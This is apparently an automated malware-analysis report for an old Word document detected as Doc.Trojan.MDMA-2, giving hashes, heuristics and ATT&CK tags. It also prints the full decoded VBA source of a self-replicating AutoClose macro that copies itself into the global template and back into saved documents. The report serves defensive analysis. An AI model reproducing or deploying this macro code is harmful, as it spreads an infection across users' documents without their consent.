Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3a4d9c6c4a86b917…

MALICIOUS

Office (OLE)

33.0 KB Created: 1999-09-08 09:35:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7ddcce37cc2fa35d7693d68f1ad5c000 SHA-1: 9f0513350a00d78b438efcaacaf38603a3d79cc2 SHA-256: 3a4d9c6c4a86b917db57e30cdb8c274b3ed8e2df4eef3ba8a72108879594866c
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a legacy Word document containing a VBA macro named 'AutoClose'. This macro is designed to copy itself to the global template, which is a common technique for establishing persistence or ensuring the macro runs automatically. The presence of the 'AutoClose' macro and the ClamAV detection strongly indicate malicious intent, likely for further payload delivery or system compromise.

Heuristics 4

  • ClamAV: Doc.Trojan.MDMA-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.MDMA-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1250 bytes
SHA-256: 6151786f997367ee75b166521ae1faa4a498e86650c220288050165672d178c7
Detection
ClamAV: Doc.Trojan.MDMA-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"

Public Sub MAIN()
    install
End Sub

Private Sub install()
Dim total
Dim installed
Dim i
    total = WordBasic.CountMacros(0)
    installed = 0
    If total > 0 Then
        For i = 1 To total
            If WordBasic.[MacroName$](i, 0) = "AutoClose" Then
                installed = 1
            End If
        Next
    End If
    If installed = 0 Then
        WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoClose", "Global:AutoClose"
    Else
        total = WordBasic.CountMacros(1)
        installed = 0
        If total > 0 Then
            For i = 1 To total
                If WordBasic.[MacroName$](i, 1) = "AutoClose" Then
                    installed = 1
                End If
            Next
        End If
        If installed = 0 Then
            WordBasic.FileSaveAs Format:=0
            WordBasic.MacroCopy "Global:AutoClose", WordBasic.[WindowName$]() + ":AutoClose"
        End If
    End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.